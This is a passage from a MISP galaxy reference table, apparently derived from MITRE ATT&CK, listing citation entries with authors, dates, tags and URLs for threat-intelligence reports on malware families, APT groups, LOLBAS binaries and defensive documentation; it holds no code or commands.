https://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99

Symantec Security Center Trojan.Kwampirs

Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.

The tag is: misp-galaxy:references="Symantec Security Center Trojan.Kwampirs"

Table 15859. Table References

Links

https://www.symantec.com/security-center/writeup/2016-081923-2700-99

Symantec Naid June 2012

Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Naid June 2012"

Table 15860. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99

Symantec Pasam May 2012

Mullaney, C. & Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Pasam May 2012"

Table 15861. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99

Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017

Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017"

Table 15862. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

Symantec Ushedix June 2008

Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Symantec Ushedix June 2008"

Table 15863. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

Symantec Volgmer Aug 2014

Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Symantec Volgmer Aug 2014"

Table 15864. Table References

Links

https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2

FSecure Lokibot November 2019

Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020.

The tag is: misp-galaxy:references="FSecure Lokibot November 2019"

Table 15865. Table References

Links

https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml

Microsoft Totbrick Oct 2017

Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.

The tag is: misp-galaxy:references="Microsoft Totbrick Oct 2017"

Table 15866. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick

Ciubotariu 2014

Ciubotariu, M. (2014, January 23). Trojan.Zeroaccess.C Hidden in NTFS EA. Retrieved December 2, 2014.

The tag is: misp-galaxy:references="Ciubotariu 2014"

Table 15867. Table References

Links

http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea

TrendMicro TROJ-FAKEAV OCT 2012

Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.

The tag is: misp-galaxy:references="TrendMicro TROJ-FAKEAV OCT 2012"

Table 15868. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

troj_zegost

Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="troj_zegost"

Table 15869. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost

TrendMicro Tropic Trooper May 2020

Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.

The tag is: misp-galaxy:references="TrendMicro Tropic Trooper May 2020"

Table 15870. Table References

Links

https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

TrendMicro Tropic Trooper Mar 2018

Horejsi, J., et al. (2018, March 14). Tropic Trooper’s New Strategy. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="TrendMicro Tropic Trooper Mar 2018"

Table 15871. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

Unit 42 Tropic Trooper Nov 2016

Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="Unit 42 Tropic Trooper Nov 2016"

Table 15872. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

paloalto Tropic Trooper 2016

Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="paloalto Tropic Trooper 2016"

Table 15873. Table References

Links

https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

GitHub truffleHog

Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="GitHub truffleHog"

Table 15874. Table References

Links

https://github.com/dxa4481/truffleHog

TCG Trusted Platform Module

Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="TCG Trusted Platform Module"

Table 15875. Table References

Links

http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

Microsoft Trusts

Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Microsoft Trusts"

Table 15876. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)

SSHjack Blackhat

Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="SSHjack Blackhat"

Table 15877. Table References

Links

https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf

Trend Micro Totbrick Oct 2016

Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.

The tag is: misp-galaxy:references="Trend Micro Totbrick Oct 2016"

Table 15878. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n

Ttdinject.exe - LOLBAS Project

LOLBAS. (2020, May 12). Ttdinject.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ttdinject.exe - LOLBAS Project"

Table 15879. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/

ttint_rat

Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.

The tag is: misp-galaxy:references="ttint_rat"

Table 15880. Table References

Links

https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/

Tttracer.exe - LOLBAS Project

LOLBAS. (2019, November 5). Tttracer.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Tttracer.exe - LOLBAS Project"

Table 15881. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Tttracer/

Invincea XTunnel

Belcher, P.. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Invincea XTunnel"

Table 15882. Table References

Links

https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/

ThreatGeek Derusbi Converge

Fidelis Threat Research Team. (2016, May 2). Turbo Twist: Two 64-bit Derusbi Strains Converge. Retrieved August 16, 2018.

The tag is: misp-galaxy:references="ThreatGeek Derusbi Converge"

Table 15883. Table References

Links

https://www.fidelissecurity.com/threatgeek/threat-intelligence/turbo-twist-two-64-bit-derusbi-strains-converge

Mandiant Suspected Turla Campaign February 2023

Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.

The tag is: misp-galaxy:references="Mandiant Suspected Turla Campaign February 2023"

Table 15884. Table References

Links

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

ESET Crutch December 2020

Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.

The tag is: misp-galaxy:references="ESET Crutch December 2020"

Table 15885. Table References

Links

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

ESET LightNeuron May 2019

Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.

The tag is: misp-galaxy:references="ESET LightNeuron May 2019"

Table 15886. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

ESET Turla Mosquito May 2018

ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="ESET Turla Mosquito May 2018"

Table 15887. Table References

Links

https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/

ESET Turla August 2018

ESET. (2018, August). Turla Outlook Backdoor: Analysis of an unusual Turla backdoor. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="ESET Turla August 2018"

Table 15888. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf

Accenture HyperStack October 2020

Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.

The tag is: misp-galaxy:references="Accenture HyperStack October 2020"

Table 15889. Table References

Links

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

Gmail Delegation

Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Gmail Delegation"

Table 15890. Table References

Links

https://support.google.com/a/answer/7223765?hl=en

Google Cloud Privilege Escalation

Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud Privilege Escalation"

Table 15891. Table References

Links

https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/

SSH in Windows

Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="SSH in Windows"

Table 15892. Table References

Links

https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh

Microsoft NEODYMIUM Dec 2016

Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft NEODYMIUM Dec 2016"

Table 15893. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

Twitter Richard WMIC

Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Twitter Richard WMIC"

Table 15894. Table References

Links

https://twitter.com/rfackroyd/status/1639136000755765254

Twitter Nick Carr APT10

Carr, N.. (2017, April 6). Retrieved June 29, 2017.

The tag is: misp-galaxy:references="Twitter Nick Carr APT10"

Table 15895. Table References

Links

https://twitter.com/ItsReallyNick/status/850105140589633536

Crowdstrike KRYPTONITE PANDA August 2018

Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="Crowdstrike KRYPTONITE PANDA August 2018"

Table 15896. Table References

Links

https://www.crowdstrike.com/blog/two-birds-one-stone-panda/

Two New Monero Malware Attacks Target Windows and Android Users

Douglas Bonderud. (2018, September 17). Two New Monero Malware Attacks Target Windows and Android Users. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="Two New Monero Malware Attacks Target Windows and Android Users"

Table 15897. Table References

Links

https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/

Trend Micro Pawn Storm April 2017

Hacquebord, F.. (2017, April 25). Two Years of Pawn Storm: Examining an Increasingly Relevant Threat. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Trend Micro Pawn Storm April 2017"

Table 15898. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf

Almond COR_PROFILER Apr 2019

Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Almond COR_PROFILER Apr 2019"

Table 15899. Table References

Links

https://offsec.almond.consulting/UAC-bypass-dotnet.html

Github UACMe

UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="Github UACMe"

Table 15900. Table References

Links

https://github.com/hfiref0x/UACME

ZScaler SEO

Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="ZScaler SEO"

Table 15901. Table References

Links

https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0

PaloAlto UBoatRAT Nov 2017

Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="PaloAlto UBoatRAT Nov 2017"

Table 15902. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

UK NSCS Russia SolarWinds April 2021

UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="UK NSCS Russia SolarWinds April 2021"

Table 15903. Table References

Links

https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise

UK Gov Malign RIS Activity April 2021

UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.

The tag is: misp-galaxy:references="UK Gov Malign RIS Activity April 2021"

Table 15904. Table References

Links

https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services

UK Gov UK Exposes Russia SolarWinds April 2021

UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.

The tag is: misp-galaxy:references="UK Gov UK Exposes Russia SolarWinds April 2021"

Table 15905. Table References

Links

https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise

UK NCSC Olympic Attacks October 2020

UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.

The tag is: misp-galaxy:references="UK NCSC Olympic Attacks October 2020"

Table 15906. Table References

Links

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

Cisco Ukraine Wipers January 2022

Biasini, N. et al.. (2022, January 21). Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation. Retrieved March 14, 2022.

The tag is: misp-galaxy:references="Cisco Ukraine Wipers January 2022"

Table 15907. Table References

Links

https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html

Symantec Ukraine Wipers February 2022

Symantec Threat Hunter Team. (2022, February 24). Ukraine: Disk-wiping Attacks Precede Russian Invasion. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Symantec Ukraine Wipers February 2022"

Table 15908. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

Bleepingcomputer Gamardeon FSB November 2021

Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.

The tag is: misp-galaxy:references="Bleepingcomputer Gamardeon FSB November 2021"

Table 15909. Table References

Links

https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/

Qualys Hermetic Wiper March 2022

Dani, M. (2022, March 1). Ukrainian Targets Hit by HermeticWiper, New Datawiper Malware. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Qualys Hermetic Wiper March 2022"

Table 15910. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware

GitHub Ultimate AppLocker Bypass List

Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="GitHub Ultimate AppLocker Bypass List"

Table 15911. Table References

Links

https://github.com/api0cradle/UltimateAppLockerByPassList

UCF. (n.d.). Unauthorized accounts must not have the Create symbolic links user right.. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="UCF STIG Symbolic Links"

Table 15912. Table References

Links

https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482

FireEye FiveHands April 2021

McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.

The tag is: misp-galaxy:references="FireEye FiveHands April 2021"

Table 15913. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

Mandiant APT29 Eye Spy Email Nov 22

Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.

The tag is: misp-galaxy:references="Mandiant APT29 Eye Spy Email Nov 22"

Table 15914. Table References

Links

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

Trend Micro DRBControl February 2020

Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Trend Micro DRBControl February 2020"

Table 15915. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

Checkpoint MosesStaff Nov 2021

Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.

The tag is: misp-galaxy:references="Checkpoint MosesStaff Nov 2021"

Table 15916. Table References

Links

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

bencane blog bashrc

Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="bencane blog bashrc"

Table 15917. Table References

Links

https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/

Juniper DAI 2020

Juniper. (2020, September 23). Understanding and Using Dynamic ARP Inspection (DAI). Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Juniper DAI 2020"

Table 15918. Table References

Links

https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-using-dai.html

Google Cloud IAM Policies

Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud IAM Policies"

Table 15919. Table References

Links

https://cloud.google.com/iam/docs/policies

Juniper Traffic Mirroring

Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Juniper Traffic Mirroring"

Table 15920. Table References

Links

https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html

U.S. CISA Understanding LockBit June 2023

Cybersecurity and Infrastructure Security Agency. (2023, June 14). Understanding Ransomware Threat Actors: LockBit. Retrieved June 30, 2023.

The tag is: misp-galaxy:references="U.S. CISA Understanding LockBit June 2023"

Table 15921. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a

Auth0 Understanding Refresh Tokens

Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.

The tag is: misp-galaxy:references="Auth0 Understanding Refresh Tokens"

Table 15922. Table References

Links

https://auth0.com/learn/refresh-tokens/

baeldung Linux proc map 2022

baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="baeldung Linux proc map 2022"

Table 15923. Table References

Links

https://www.baeldung.com/linux/proc-id-maps

FireEye KEGTAP SINGLEMALT October 2020

Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.

The tag is: misp-galaxy:references="FireEye KEGTAP SINGLEMALT October 2020"

Table 15924. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Wikipedia UEFI

Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Wikipedia UEFI"

Table 15925. Table References

Links

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

New DragonOK

Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.

The tag is: misp-galaxy:references="New DragonOK"

Table 15926. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

Unit 42 Playbook Dec 2017

Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Unit 42 Playbook Dec 2017"

Table 15927. Table References

Links

https://pan-unit42.github.io/playbook_viewer/

Unit 42 SeaDuke 2015

Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Unit 42 SeaDuke 2015"

Table 15928. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/

3OHA double-fork 2022

Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="3OHA double-fork 2022"

Table 15929. Table References

Links

https://0xjet.github.io/3OHA/2022/04/11/post.html

Flashpoint Anonymous Sudan Timeline

Flashpoint. (2023, June 20). Unmasking Anonymous Sudan: Timeline of DDoS Attacks, Affiliations, and Motivations. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Flashpoint Anonymous Sudan Timeline"

Table 15930. Table References

Links

https://flashpoint.io/blog/anonymous-sudan-ddos-timeline/

AADInternals Azure AD On-Prem to Cloud

Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="AADInternals Azure AD On-Prem to Cloud"

Table 15931. Table References

Links

https://o365blog.com/post/on-prem_admin/

Adsecurity Mimikatz Guide

Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Adsecurity Mimikatz Guide"

Table 15932. Table References

Links

https://adsecurity.org/?page_id=1821

Kaspersky Lamberts Toolkit April 2017

GREAT. (2017, April 11). Unraveling the Lamberts Toolkit. Retrieved March 21, 2022.

The tag is: misp-galaxy:references="Kaspersky Lamberts Toolkit April 2017"

Table 15933. Table References

Links

https://securelist.com/unraveling-the-lamberts-toolkit/77990/

CrowdStrike Grim Spider May 2019

John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="CrowdStrike Grim Spider May 2019"

Table 15934. Table References

Links

https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/

Unregmp2.exe - LOLBAS Project

LOLBAS. (2021, December 6). Unregmp2.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Unregmp2.exe - LOLBAS Project"

Table 15935. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/

TrendMicro Patchwork Dec 2017

Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="TrendMicro Patchwork Dec 2017"

Table 15936. Table References

Links

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

Kaspersky Careto

Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Kaspersky Careto"

Table 15937. Table References

Links

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

Cymmetria Patchwork

Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Cymmetria Patchwork"

Table 15938. Table References

Links

https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

Rapid7G20Espionage

Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="Rapid7G20Espionage"

Table 15939. Table References

Links

https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

Unit 42 BackConfig May 2020

Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Unit 42 BackConfig May 2020"

Table 15940. Table References

Links

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

Secureworks Karagany July 2019

Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.

The tag is: misp-galaxy:references="Secureworks Karagany July 2019"

Table 15941. Table References

Links

https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

Update.exe - LOLBAS Project

LOLBAS. (2019, June 26). Update.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Update.exe - LOLBAS Project"

Table 15942. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/

Microsoft - Update or Repair Federated domain

Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Update or Repair Federated domain"

Table 15943. Table References

Links

https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

Trendmicro Evolving ThiefQuest 2020

Gabrielle Joyce Mabutas, Luis Magisa, Steven Du. (2020, July 17). Updates on Quickly-Evolving ThiefQuest macOS Malware. Retrieved April 26, 2021.

The tag is: misp-galaxy:references="Trendmicro Evolving ThiefQuest 2020"

Table 15944. Table References

Links

https://www.trendmicro.com/en_us/research/20/g/updates-on-quickly-evolving-thiefquest-macos-malware.html

AWS Update Trail

AWS. (n.d.). update-trail. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="AWS Update Trail"

Table 15945. Table References

Links

https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html

Unit 42 Pirpi July 2015

Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Unit 42 Pirpi July 2015"

Table 15946. Table References

Links

https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

PaperCut MF/NG vulnerability bulletin

PaperCut. (2023, March 8). URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="PaperCut MF/NG vulnerability bulletin"

Table 15947. Table References

Links

https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps

Url.dll - LOLBAS Project

LOLBAS. (2018, May 25). Url.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Url.dll - LOLBAS Project"

Table 15948. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Url/

NJCCIC Ursnif Sept 2016

NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="NJCCIC Ursnif Sept 2016"

Table 15949. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif

TrendMicro Ursnif Mar 2015

Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro Ursnif Mar 2015"

Table 15950. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992

US Coast Guard Killnet August 17 2022

US Coast Guard Cyber Command. (2022, August 17). US Coast Guard Cyber Command Maritime Cyber Alert 03-22. Retrieved October 9, 2023.

The tag is: misp-galaxy:references="US Coast Guard Killnet August 17 2022"

Table 15951. Table References

Links

https://www.dco.uscg.mil/Portals/9/Maritime%20Cyber%20Alert%2003-22%20KILLNET%20TLP%20WHITE.pdf

USCYBERCOM SLOTHFULMEDIA October 2020

USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="USCYBERCOM SLOTHFULMEDIA October 2020"

Table 15952. Table References

Links

https://twitter.com/CNMF_CyberAlert/status/1311743710997159953

win10_asr

Microsoft. (2021, July 2). Use attack surface reduction rules to prevent malware infection. Retrieved June 24, 2021.

The tag is: misp-galaxy:references="win10_asr"

Table 15953. Table References

Links

https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction

Azure AD Conditional Access Exclusions

Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Azure AD Conditional Access Exclusions"

Table 15954. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion

Docker Bind Mounts

Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Docker Bind Mounts"

Table 15955. Table References

Links

https://docs.docker.com/storage/bind-mounts/

Chrome Roaming Profiles

Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.

